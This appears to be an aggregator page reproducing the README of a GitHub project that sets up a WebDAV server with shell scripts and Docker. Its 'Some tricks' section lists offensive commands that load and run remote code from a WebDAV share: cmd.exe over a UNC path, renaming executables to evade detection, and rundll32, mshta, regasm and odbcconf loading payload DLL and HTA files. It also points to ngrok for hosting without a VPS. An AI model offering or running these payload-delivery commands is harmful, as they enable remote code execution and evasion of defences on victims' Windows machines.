All Projects → Ridter → WebDAV

Ridter / WebDAV

Licence: other
Set Up WebDAV Server for Remote File Sharing and more

Programming Languages

shell
77523 projects
Dockerfile
14818 projects

Set Up WebDAV Server for Remote File Sharing

Usage

Build:

chmod+x build.sh
.\build.sh

Start server:

chmod +x start.sh
.\start.sh 8080

Example

Just put the file in share folder.

UNC PATH

\\server@port\folder
\\server@SSL@port\folder

Some tricks

\\server@port\folder\cmd.exe /c whoami

You can rename cmd.exe to any name you want, example:cmd.txt

More?

rundll32 \\webdavserver\folder\payload.dll
mshta \\webdavserver\folder\payload.hta
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll
odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
...

No VPS?

Try ngrok..

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].